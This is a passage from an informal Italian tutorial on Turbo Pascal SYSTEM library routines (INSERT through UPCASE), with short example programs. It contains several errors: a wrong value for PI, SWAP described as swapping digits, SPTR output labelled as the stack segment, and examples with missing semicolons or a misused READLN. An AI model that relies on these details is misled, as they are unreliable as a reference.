 |Include un elemento in un set                                               |
 |----------------------------------------------------------------------------|
 |PROCEDURE INSERT;                                                           |
 |PROCEDURE INSERT(SOURCE:STRING; VAR S:STRING; INDEX:INTEGER);               |
 |                                                                            |
 |Inserisce una substringa in una stringa                                     |
 |                                                                            |
 |o meglio, inserisce S in SOURCE a partire dall'INDEX carattere di SOURCE    |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto INSERT}                                                           |
 |PROGRAM USEINSER;                                                           |
 |USES CRT;                                                                   |
 |VAR S:STRING;                                                               |
 |BEGIN                                                                       |
 |S:='CIAO A TUTTI';                                                          |
 |INSERT(' PIRLI',S,5);                                                       |
 |WRITELN(S);                                                                 |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION INT;                                                               |
 |FUNCTION INT(X:REAL):REAL;                                                  |
 |                                                                            |
 |Ritorna la parte intera di X (il contrario di frac)                         |
 |                                                                            |
 |Ex.                                                                         |
 |se X vale 123.456 allora INT(X) = 123                                       |
 |v'as capì?                                                                  |
 |----------------------------------------------------------------------------|
 |FUNCTION IORESULT;                                                          |
 |FUNCTION IORESULT:INTEGER;                                                  |
 |                                                                            |
 |Ritorna lo stato dell'ultima operazione di Input/Output eseguita            |
 |però il controllo di Input e Output dev'essere disattivato con l'opzione    |
 |$I- tra le parentesi graffe                                                 |
 |                                                                            |
 |non credo di dovervi un esempio siccome ve l'ho già fatto prima             |
 |----------------------------------------------------------------------------|
 |FUNCTION LENGTH;                                                            |
 |FUNCTION LENGTH(S:STRING):INTEGER;                                          |
 |                                                                            |
 |Ritorna la lunghezza di una stringa                                         |
 |                                                                            |
 |Ex.                                                                         |
 |se S='Ciao' allora LENGTH(S) = 4                                            |
 |v'as capì?                                                                  |
 |ovviamente, per trovare le lunghezze di una stringa esistono le funzioni    |
 |della libreria STRINGS ma queste la lascio a dopo                           |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION LN;                                                                |
 |FUNCTION LN(X:REAL):REAL;                                                   |
 |                                                                            |
 |Ritorna il logaritmo di X                                                   |
 |                                                                            |
 |Ex.                                                                         |
 |se X = EXP(1) allora LN(X) = 1                                              |
 |la matematica non è un opinione :D                                          |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION LO;                                                                |
 |FUNCTION LO(X):BYTE;                                                        |
 |                                                                            |
 |Ritorna i bytes inferiori di X (INTEGER o WORD)                             |
 |                                                                            |
 |Ex.                                                                         |
 |se X = Lo($1234) allora LO(X) = $34                                         |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION LOW;                                                               |
 |FUNCTION LOW(X):BYTE;                                                       |
 |                                                                            |
 |Ritorna l'indice più basso dell'array X                                     |
 |Ex                                                                          |
 |se dichiariamo X:ARRAY[0..50] OF tipo allora LOW(X) = 0                     |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |                                                                            |
 |          PAUSA DELLO SCRITTORE          PAUSA DELLO SCRITTORE              |
 |                                                                            |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |Oh, abbiamo finito la prima di 3 parti della libreria SYSTEM                |
 |continuiamo...                                                              |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION MAXAVAIL;                                                          |
 |FUNCTION MAXAVAIL:LONGINT;                                                  |
 |                                                                            |
 |Ritorna il blocco più grande che c'è nell'heap                              |
 |                                                                            |
 |non credo che serviranno esempi...                                          |
 |----------------------------------------------------------------------------|
 |FUNCTION MEMAVAIL;                                                          |
 |FUNCTION MEMAVAIL:LONGINT;                                                  |
 |                                                                            |
 |Ritorna TUTTA la memoria libera che c'è nell'heap                           |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE MKDIR;                                                            |
 |PROCEDURE MKDIR(S:STRING);                                                  |
 |                                                                            |
 |Crea una sottocartella                                                      |
 |                                                                            |
 |crea una sottocartella nella directory corrente con il nome S               |
 |                                                                            |
 |con l'opzione $I- IOResult ritorna il risultato dell'operazione             |
 |----------------------------------------------------------------------------|
 |PROCEDURE MOVE;                                                             |
 |PROCEDURE MOVE(VAR SOURCE, DEST; COUNT:WORD);                               |
 |                                                                            |
 |Copia SOURCE dentro DEST                                                    |
 |                                                                            |
 |fate attenzione col COUNT perché potrete causare un buffer overflow         |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto MOVE}                                                             |
 |                                                                            |
 |PROGRAM USEMOVE;                                                            |
 |USES CRT;                                                                   |
 |VAR A:ARRAY[1..4] OF CHAR;                                                  |
 |    B:LONGINT;                                                              |
 |BEGIN                                                                       |
 |MOVE(A,B,SIZEOF(A));                                                        |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE NEW;                                                              |
 |PROCEDURE NEW(VAR P:POINTER [,INIT:CONSTRUCTOR]);                           |
 |                                                                            |
 |Crea una nuova variabile nell'heap e viene puntato da P                     |
 |io preferisco questa in confronto di GETMEM perché è più facile da usare    |
 |preferisco anche DISPOSE in confronto di FREEMEM per lo stesso motivo :D    |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto NEW e DISPOSE}                                                    |
 |PROGRAM USENEWDI;                                                           |
 |USES CRT;                                                                   |
 |TYPE AMICO = RECORD                                                         |
 |              NOME:STRING[10];                                              |
 |              ETA:BYTE;                                                     |
 |             END;                                                           |
 |VAR P: ^AMICO;                                                              |
 |                                                                            |
 |BEGIN                                                                       |
 |NEW(P);                                                                     |
 |CLRSCR;                                                                     |
 |WRITELN('INSERISCI UN NOME');                                               |
 |READLN(P^.NOME);                                                            |
 |WRITELN('INSERISCI UN''ETA'''');                                            |
 |READLN(P^.ETA);                                                             |
 |CLRSCR;                                                                     |
 |WRITELN('NOME: ',P^.NOME);                                                  |
 |WRITELN('ETA'' : ',P^.ETA);                                                 |
 |DISPOSE(P);                                                                 |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |Probabilmente molti di voi non hanno capito P:^AMICO                        |
 |vuol dire semplicemente P (puntatore) che punta a una variabile di tipo AMIC|
 |v'as capì?                                                                  |
 |                                                                            |
 |poi i READLN(P^.NOME);                                                      |
 |beh, questo vuol dire che all'indirizzo di P dov'è situato NOME readlinizza |
 |e lo stesso vale per i writeln                                              |
 |ovviamente il discorso verrà ampliato quando studieremo i puntatori         |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION ODD                                                                |
 |FUNCTION ODD(X:LONGINT):BOOLEAN;                                            |
 |                                                                            |
 |Se X è dispari allora ODD = TRUE altrimenti FALSE                           |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION OFS;                                                               |
 |FUNCTION OFS(X):WORD;                                                       |
 |                                                                            |
 |Ritorna l'offset di un qualsiasi oggetto (var,const,type,procedure,function)|
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto OFS}                                                              |
 |PROGRAM USEOFS;                                                             |
 |USES CRT;                                                                   |
 |PROCEDURE SCRIVI_IN_HEX(W:WORD);                                            |
 |CONST HEXCHAR:ARRAY[0..$F] OF CHAR = '0123456789ABCDEF';                    |
 |BEGIN                                                                       |
 |WRITE(HEXCHAR[HI(W) SHR 4],                                                 |
 |      HEXCHAR[HI(W) AND $F],                                                |
 |      HEXCHAR[LO(W) SHR 4],                                                 |
 |      HEXCHAR[LO(W) AND $F]);                                               |
 |END;                                                                        |
 |                                                                            |
 |VAR I:INTEGER;                                                              |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |WRITELN('INSERISCI UN VALORE DA DARE A I');                                 |
 |READLN(I);                                                                  |
 |WRITELN;WRITELN;WRITELN;                                                    |
 |WRITE('I SI TROVA ALL''OFFSET: ');                                          |
 |SCRIVI_IN_HEX(OFS(I));                                                      |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION ORD;                                                               |
 |FUNCTION ORD(X):LONGINT;                                                    |
 |                                                                            |
 |Ritorna il numero ordinale di un espressione                                |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto ORD}                                                              |
 |PROGRAM USEORD;                                                             |
 |USES CRT;                                                                   |
 |TYPE COL = (ROSSO,GIALLO,BLU);                                              |
 |BEGIN                                                                       |
 |WRITELN('IL BLU HA UN VALORE ORDINALE DI ',ORD(BLU));                       |
 |WRITELN('QUINDI IL ROSSO HA UN VALORE ORDINALE DI ',ORD(ROSSO));            |
 |WRITELN;WRITELN;                                                            |
 |WRITELN('IL CARATTERE ASCII "C" HA UN VALORE ORDINALE DI ',ORD('C'));       |
 |WRITELN;                                                                    |
 |WRITELN('V''AS CAPI''?');                                                   |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION PARAMCOUNT;                                                        |
 |FUNCTION PARAMCOUNT:WORD;                                                   |
 |                                                                            |
 |Ritorna il numero di parametri passati al programma nella riga di comando   |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto PARAMCOUNT}                                                       |
 |PROGRAM USEPC;                                                              |
 |USES CRT;                                                                   |
 |BEGIN                                                                       |
 |IF PARAMCOUNT = 0 THEN WRITELN('NON CI SONO PARAMETRI')                     |
 |ELSE WRITELN('CI SONO ',PARAMCOUNT,' PARAMETRI');                           |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |Se nella chiamiamo il file compilato PROVA, e nella riga di comando mettiamo|
 |PROVA                                                                       |
 |otterremo NON CI SONO PARAMETRI                                             |
 |se invece mettiamo:                                                         |
 |PROVA CIAO RICIAO RIRICIAO                                                  |
 |otterremo CI SONO 3 PARAMETRI                                               |
 |v'as capì?                                                                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION PARAMSTR;                                                          |
 |FUNCTION PARAMSTR(INDEX):STRING;                                            |
 |                                                                            |
 |Ritorna l'INDEXesimo parametro scritto nella riga di comando                |
 |                                                                            |
 |Eggzample!                                                                  |
 |(come nel progetto di prima chiameremo il file PROVA e metteremo gli stessi |
 |parametri)                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto PARAMSTR}                                                         |
 |PROGRAM USEPS;                                                              |
 |USES CRT;                                                                   |
 |VAR I:WORD;                                                                 |
 |BEGIN                                                                       |
 |IF PARAMCOUNT=0 THEN WRITELN('NESSUN PARAMETRO')                            |
 |ELSE                                                                        |
 | BEGIN                                                                      |
 |  FOR I:=1 TO PARAMCOUNT DO                                                 |
 |   WRITELN(PARAMSTR(I));                                                    |
 | END;                                                                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |otterremo NESSUN PARAMETRO se non mettiamo nessun parametro                 |
 |otterremo CIAO RICIAO RIRICIAO se rimettiamo gli stessi parametri di prima  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION PI;                                                                |
 |FUNCTION PI:REAL;                                                           |
 |                                                                            |
 |Ritorna il valore del Pi Greco ( 3.1215926535897932385 )                    |
 |                                                                            |
 |non credo che servano esempi per questo                                     |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION POS;                                                               |
 |FUNCTION POS(SUBSTR:STRING; S:STRING):BYTE;                                 |
 |                                                                            |
 |Cerca SUBSTR dentro S e ritorna l'indice del primo carattere di S con SUBSTR|
 |se non c'è SUBSTR dentro S allora POS ritorna 0                             |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto POS}                                                              |
 |PROGRAM USEPOS;                                                             |
 |USES CRT;                                                                   |
 |VAR S:STRING;                                                               |
 |BEGIN                                                                       |
 |S:='   123.5';                                                              |
 |WHILE POS(' ',S) > 0 DO                                                     |
 |  S[POS(' ',S)] := '*';                                                     |
 |END.                                                                        |
 |{converti ogni spazio della stringa in asterischi}                          |
 |----------------------------------------------------------------------------|
 |FUNCTION PRED;                                                              |
 |FUNCTION PRED(X:T):T;                                                       |
 |                                                                            |
 |Ritorna il numero precedente a X                                            |
 |                                                                            |
 |Ex.                                                                         |
 |se X vale 6 allora PRED(X) = 5                                              |
 |                                                                            |
 |tutti i numeri sono validi tranne numeri REALI                              |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION PTR;                                                               |
 |FUNCTION PTR(SEG,OFS:WORD):POINTER;                                         |
 |                                                                            |
 |Converte una base SEGMENT e un'indirizzo OFFSET in un puntatore             |
 |                                                                            |
 |Ritorna in poche parole un puntatore che punta a SEG:OFS                    |
 |prendiamo ad esempio il tipo di video:                                      |
 |il tipo di video si trova all'indirizzo $40:$49                             |
 |in quell'indirizzo c'è il valore che determina il tipo di video, allora da  |
 |là possiamo fare un esempio di PTR                                          |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto PTR}                                                              |
 |PROGRAM USEPTR;                                                             |
 |USES CRT;                                                                   |
 |VAR P:^BYTE;                                                                |
 |BEGIN                                                                       |
 |P:=PTR($40,$49); {LO FACCIAMO PUNTARE ALL'INDIRIZZO DEL TIPO DI VIDEO}      |
 |WRITELN('IL TIPO DI VIDEO è: ', P^);                                        |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION RANDOM;                                                            |
 |FUNCTION RANDOM [(RANGE:WORD)]:T;                                           |
 |                                                                            |
 |Ritorna un numero casuale                                                   |
 |Per inizializzare il generatore di numeri casuali, bisogna chiamare la      |
 |procedura RANDOMIZE                                                         |
 |                                                                            |
 |per ottenere un numero casuale tra 0 e 10, basterà mettere al posto di RANGE|
 |10                                                                          |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto RANDOM}                                                           |
 |PROGRAM USERANDO;                                                           |
 |USES CRT;                                                                   |
 |VAR CH:CHAR;                                                                |
 |BEGIN                                                                       |
 |RANDOMIZE;                                                                  |
 |REPEAT                                                                      |
 | CH:=CHR(RANDOM(255));                                                      |
 | WRITE(CH);                                                                 |
 |UNTIL KEYPRESSED;                                                           |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE RANDOMIZE;                                                        |
 |PROCEDURE RANDOMIZE;                                                        |
 |                                                                            |
 |Inizia a generare numeri casuali                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE READ;                                                             |
 | - PROCEDURE READ(F,V1 [,V2,...,VN] );                                      |
 | - PROCEDURE READ( [VAR F:TEXT;] V1 [,V2,...,VN] );                         |
 |                                                                            |
 |Questa procedura ha più funzioni, infatti come abbiamo letto nei primi      |
 |tutorial, con questa procedura si può assegnare un valore a una variabile,  |
 |ma si può anche leggere da files N variabili                                |
 |                                                                            |
 |non credo che vi servano esempi per questo tute, se non sapete come funziona|
 |READ allora datevi all'ippica                                               |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE READLN;                                                           |
 |PROCEDURE READLN([VAR F:TEXT;] V1 [,V2,...,VN] );                           |
 |                                                                            |
 |Questa qua sapete come funziona nella console, ma non vi ho mai detto che   |
 |si può leggere anche nei files (TEXT) con questa procedura, beh ora ve l'ho |
 |detto :D                                                                    |
 |                                                                            |
 |Ex.                                                                         |
 |READLN(_variabile_);                                                        |
 |READLN(_fileText_ , _variabileStringa_ );                                   |
 |                                                                            |
 |in pratica, legge una riga intera di un file (la seconda)                   |
 |mentre la prima legge il valore immesso nella console e poi inserisce una   |
 |linea (un invio)                                                            |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE RENAME;                                                           |
 |PROCEDURE RENAME(VAR F; NEWNAME);                                           |
 |                                                                            |
 |Rinomina un file assegnato                                                  |
 |                                                                            |
 |con l'opzione $I- IOResult ritorna 0 se l'operazione ha successo, altrimenti|
 |un valore diverso da 0                                                      |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE RESET;                                                            |
 |PROCEDURE RESET(VAR F[:FILE; RECSIZE:WORD] );                               |
 |                                                                            |
 |Apre un file                                                                |
 |                                                                            |
 |F è una variabile FILE (TEXT e FILE) assegnato, mentre RECSIZE è            |
 |un'espressione opzionale word che si può specificare solo se F è un file    |
 |senza tipo ma non credo che lo userete mai                                  |
 |                                                                            |
 |Reset apre un file esistente, se il file non esiste popperà un RunTime Error|
 |se F è già aperto, allora verrà chiuso e riaperto, il cursore verrà settato |
 |all'inizio del file                                                         |
 |                                                                            |
 |Se F è un file TEXT allora F diventa di sola lettura                        |
 |                                                                            |
 |con l'opzione $I- IOResult ritorna 0 se l'operazione ha successo, altrimenti|
 |un valore diverso da 0                                                      |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE REWRITE;                                                          |
 |PROCEDURE REWRITE(VAR F:FILE [;RECSIZE:WORD] );                             |
 |                                                                            |
 |Crea e apre un file assegnato (se il file esiste già lo sovrascrive)        |
 |                                                                            |
 |F è una variabile FILE (TEXT e FILE) assegnato, mentre RECSIZE è sempre la  |
 |stessa espressione che non serve a una pippa                                |
 |                                                                            |
 |ReWrite crea o sovrascrive un file assegnato, se il file è già aperto allora|
 |il file verrà chiuso, cancellato e creato                                   |
 |il cursore verrà settato all'inizio del file, quindi ogni chiamata a EOF(F) |
 |ritornerà SEMPRE TRUE                                                       |
 |                                                                            |
 |se F è un file TEXT allora F diventa di sola scrittura                      |
 |                                                                            |
 |con l'opzione $I- IOResult ritorna 0 se l'operazione ha successo, altrimenti|
 |un valore diverso da 0                                                      |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE RMDIR;                                                            |
 |PROCEDURE RMDIR(S:STRING);                                                  |
 |                                                                            |
 |Cancella una Directory vuota                                                |
 |Cancella una directory vuota con l'indirizzo specificato da S. Se l'indirizz|
 |non esiste o la cartella non è vuota, o è la directory corrente, popperà    |
 |un Run-Time Error                                                           |
 |                                                                            |
 |con l'opzione $I- IOResult ritorna 0 se l'operazione ha successo, altrimenti|
 |un valore diverso da 0                                                      |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION ROUND;                                                             |
 |FUNCTION ROUND(X:REAL):LONGINT;                                             |
 |                                                                            |
 |Approssima un numero decimale all'unità                                     |
 |                                                                            |
 |Ex.                                                                         |
 |se X = 1.4 allora ROUND = 1                                                 |
 |se X = 1.5 allora ROUND = 2                                                 |
 |v'as capì?                                                                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE RUNERROR;                                                         |
 |PROCEDURE RUNERROR [(ERRORCODE:BYTE)];                                      |
 |                                                                            |
 |Ferma l'esecuzione del programma facendo poppare un Run-Time Error col numer|
 |ERRORCODE                                                                   |
 |(questa procedura, non è qua per divertirsi, ma è per gestire al meglio il  |
 | programma, ad esempio, io voglio fare un esecuzione togliendo TUTTI i      |
 | RunTime Error, se facciamo qualche casino, allora il computer va in tutti i|
 | casini possibili, ma se si è BRAVI [io non la so usare 'sta procedura] si  |
 | può essere PADRONI del computer)                                           |
 |                                                                            |
 |qua vi cito un esempio del mitico HackHertz (perché io non ne sarei stato   |
 |capace)                                                                     |
 |----------------------------------------------------------------------------|
 |{progetto RUNERROR}                                                         |
 |VAR P:POINTER;                                                              |
 |                                                                            |
 |BEGIN                                                                       |
 | P:=NIL;                                                                    |
 | IF P = NIL THEN RUNERROR(204);                                             |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |                                                                            |
 |          PAUSA DELLO SCRITTORE          PAUSA DELLO SCRITTORE              |
 |                                                                            |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |Ok ragazzi, siamo arrivati all'ultima parte di questo tutorial... FIUUU     |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE SEEK;                                                             |
 |PROCEDURE SEEK(VAR F; N:LONGINT);                                           |
 |                                                                            |
 |Sposta il cursore del file al Nesimo byte di F                              |
 |                                                                            |
 |tutti i files possono "subire" questa procedura tranne i TEXT               |
 |                                                                            |
 |Con l'opzione $I- IOResult ritorna 0 se l'operazione ha successo, altrimenti|
 |un valore diverso da 0                                                      |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto SEEK}                                                             |
 |PROGRAM USESEEK;                                                            |
 |USES CRT;                                                                   |
 |VAR F:FILE OF CHAR;                                                         |
 |    TOT:LONGINT;                                                            |
 |BEGIN                                                                       |
 |IF PARAMCOUNT = 0 THEN WRITELN('USAGE: CIPPO FILE')                         |
 |ELSE ASSIGN(F,PARAMSTR(1));                                                 |
 |RESET(F);                                                                   |
 |TOT:=FILESIZE(F);                                                           |
 |WRITELN('IL FILE OCCUPA ',TOT,' BYTES');                                    |
 |WRITELN('MI SPOSTO A META'' DEL FILE');                                     |
 |SEEK(F,TOT DIV 2);                                                          |
 |WRITELN('ORA MI TROVO ALL''',FILEPOS(F),'esimo BYTE DI F');                 |
 |CLOSE(F);                                                                   |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION SEEKEOF;                                                           |
 |FUNCTION SEEKEOF [(VAR F:TEXT) ]:BOOLEAN;                                   |
 |                                                                            |
 |Ritorna TRUE se siamo alla fine del file, e può essere usato solo con i file|
 |TEXT (il file dev'essere aperto)                                            |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto SEEKEOF}                                                          |
 |PROGRAM USESEEKE;                                                           |
 |USES CRT;                                                                   |
 |VAR F:TEXT;                                                                 |
 |    I,J:INTEGER;                                                            |
 |BEGIN                                                                       |
 |ASSIGN(F,'TEXT.TXT');                                                       |
 |REWRITE(F);                                                                 |
 |WRITELN(F,'1 2 3 4 ');                                                      |
 |WRITELN(F,'5 6 7 8 ');                                                      |
 |RESET(F);                                                                   |
 |WHILE NOT SEEKEOF(F) DO                                                     |
 | BEGIN                                                                      |
 |  IF SEEKEOLN(F) THEN                                                       |
 |   READLN;                                                                  |
 |  READ(F,J);                                                                |
 |  WRITELN(J);                                                               |
 | END;                                                                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION SEEKEOLN;                                                          |
 |FUNCTION SEEKEOLN [(VAR F:TEXT)] :BOOLEAN;                                  |
 |                                                                            |
 |Ritorna TRUE se è finita la riga, altrimenti FALSE                          |
 |può essere usato solo su files TEXT e il file dev'essere aperto             |
 |                                                                            |
 |(esempio fatto prima)                                                       |
 |----------------------------------------------------------------------------|
 |FUNCTION SEG;                                                               |
 |FUNCTION SEG(X):WORD;                                                       |
 |                                                                            |
 |Ritorna il Segmento di un oggetto                                           |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto SEG}                                                              |
 |PROGRAM USESEG;                                                             |
 |USES CRT;                                                                   |
 |PROCEDURE SCRIVI_IN_HEX(W:WORD);                                            |
 |CONST HEXCHAR:ARRAY[0..$F] OF CHAR = '0123456789ABCDEF';                    |
 |BEGIN                                                                       |
 |WRITE(HEXCHAR[HI(W) SHR 4],                                                 |
 |      HEXCHAR[HI(W) AND $F],                                                |
 |      HEXCHAR[LO(W) SHR 4],                                                 |
 |      HEXCHAR[LO(W) AND $F]);                                               |
 |END;                                                                        |
 |VAR I:INTEGER;                                                              |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |WRITELN('IL SEGMENTO DI I è ',SEG(I));                                      |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE SETTEXTBUF;                                                       |
 |PROCEDURE SETTEXTBUF(VAR F:TEXT; VAR BUF [;SIZE:WORD] );                    |
 |                                                                            |
 |Assegna un buffer di I/O a un file TEXT                                     |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto SETTEXTBUF}                                                       |
 |PROGRAM USESETTE;                                                           |
 |USES CRT;                                                                   |
 |VAR F:TEXT;                                                                 |
 |    CH:CHAR;                                                                |
 |    BUF:ARRAY[1..4095] OF CHAR;  {4Kb di buffer}                            |
 |BEGIN                                                                       |
 |ASSIGN(F,PARAMSTR(1));                                                      |
 |SETTEXTBUF(F,BUF);                                                          |
 |RESET(F);                                                                   |
 |WHILE NOT EOF(F) DO                                                         |
 | BEGIN                                                                      |
 |  READ(F,CH);                                                               |
 |  WRITE(CH);                                                                |
 | END;                                                                       |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |In poche parole più grande è il buffer e più veloce è la lettura            |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION SIN;                                                               |
 |FUNCTION SIN(X:REAL):REAL;                                                  |
 |                                                                            |
 |Ritorna il seno di X                                                        |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION SIZEOF;                                                            |
 |FUNCTION SIZEOF:INTEGER;                                                    |
 |                                                                            |
 |Ritorna la grandezza di un qualsiasi oggetto                                |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION SPTR;                                                              |
 |FUNCTION SPTR:WORD;                                                         |
 |                                                                            |
 |Ritorna il valore del registro SP (Stack Pointer)                           |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto SPTR}                                                             |
 |PROGRAM USESPTR;                                                            |
 |USES CRT;                                                                   |
 |PROCEDURE SCRIVI_IN_HEX(W:WORD);                                            |
 |CONST                                                                       |
 |HEXCHAR:ARRAY [0..$F] OF CHAR = '0123456789ABCDEF'                          |
 |BEGIN                                                                       |
 |WRITE(HEXCHAR[HI(W) SHR 4],                                                 |
 |      HEXCHAR[HI(W) AND $F],                                                |
 |      HEXCHAR[LO(W) SHR 4],                                                 |
 |      HEXCHAR[LO(W) AND $F]);                                               |
 |END;                                                                        |
 |                                                                            |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |WRITE('LO STACK SEGMENT ADESSO è: ');                                       |
 |SCRIVI_IN_HEX(SPTR);                                                        |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION SQR;                                                               |
 |FUNCTION SQR(X:T):T;                                                        |
 |                                                                            |
 |Ritorna il quadrato di X   (xý)                                             |
 |                                                                            |
 |Ex.                                                                         |
 |se X=5 allora SQR(X) = 25                                                   |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION SQRT;                                                              |
 |FUNCTION SQRT(X:REAL):REAL;                                                 |
 |                                                                            |
 |Ritorna la radice quadrata di X                                             |
 |                                                                            |
 |Ex.                                                                         |
 |se X=2 allora SQRT(X) = 1.4142135624 ...                                    |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION SSEG;                                                              |
 |FUNCTION SSEG:WORD;                                                         |
 |                                                                            |
 |Ritorna il valore corrente del registro SS (Stack Segment)                  |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto SSEG}                                                             |
 |PROGRAM USESSEG;                                                            |
 |USES CRT;                                                                   |
 |PROCEDURE SCRIVI_IN_HEX(W:WORD);                                            |
 |CONST                                                                       |
 |HEXCHAR:ARRAY [0..$F] OF CHAR = '0123456789ABCDEF'                          |
 |BEGIN                                                                       |
 |WRITE(HEXCHAR[HI(W) SHR 4],                                                 |
 |      HEXCHAR[HI(W) AND $F],                                                |
 |      HEXCHAR[LO(W) SHR 4],                                                 |
 |      HEXCHAR[LO(W) AND $F]);                                               |
 |END;                                                                        |
 |                                                                            |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |WRITELN('LO STACK SEGMENT ADESSO è: ');                                     |
 |SCRIVI_IN_HEX(SSEG);                                                        |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |PROCEDURE STR;                                                              |
 |PROCEDURE STR(X [:WIDTH [:DECIMALS]]; VAR S:STRING);                        |
 |                                                                            |
 |Converte un valore numerico a una stringa (come lo SPRINTF in C )           |
 |                                                                            |
 |Eggzample!                                                                  |
 |----------------------------------------------------------------------------|
 |{progetto STR}                                                              |
 |PROGRAM USESTR;                                                             |
 |USES CRT;                                                                   |
 |FUNCTION SPRINTF(I:LONGINT):STRING;                                         |
 |VAR S:STRING[11];                                                           |
 |BEGIN                                                                       |
 |STR(I,S);                                                                   |
 |SPRINTF:=S;                                                                 |
 |END;                                                                        |
 |                                                                            |
 |BEGIN                                                                       |
 |WRITELN(SPRINTF(-5322));                                                    |
 |END.                                                                        |
 |----------------------------------------------------------------------------|
 |FUNCTION SUCC;                                                              |
 |FUNCTION SUCC(X:T):T;                                                       |
 |                                                                            |
 |Ritorna il numero successivo di X (quando X è un intero e non un REAL)      |
 |                                                                            |
 |SUCC(X) è uguale a X+1;                                                     |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION SWAP;                                                              |
 |FUNCTION SWAP(X:T):T;                                                       |
 |                                                                            |
 |                                                                            |
 |Scambia di posto le cifre di X                                              |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION TRUNC;                                                             |
 |FUNCTION TRUNC(X:REAL):LONGINT;                                             |
 |                                                                            |
 |Tronca una variabile real in una variabile INTEGER                          |
 |eggzample!                                                                  |
 |se X=1.4 allora Trunc(X)=1                                                  |
 |v'as capì?                                                                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE TRUNCATE;                                                         |
 |PROCEDURE TRUNCATE(VAR F);                                                  |
 |                                                                            |
 |Tronca il file alla posizione corrente, cioè, tutti i dati dopo il cursore  |
 |vengono cancellati                                                          |
 |                                                                            |
 |Ex.                                                                         |
 |se nel file CIAO.TXT c'è scritto: 123456                                    |
 |dopo una chiamata a trunc, CIAO.TXT conterrà 123 se siamo al terzo byte     |
 |v'as capì?                                                                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |FUNCTION UPCASE;                                                            |
 |FUNCTION UPCASE(CH:CHAR):CHAR;                                              |
 |                                                                            |
 |Converte un carattere al suo maiuscolo, i caratteri fuori dall'insieme a..z |
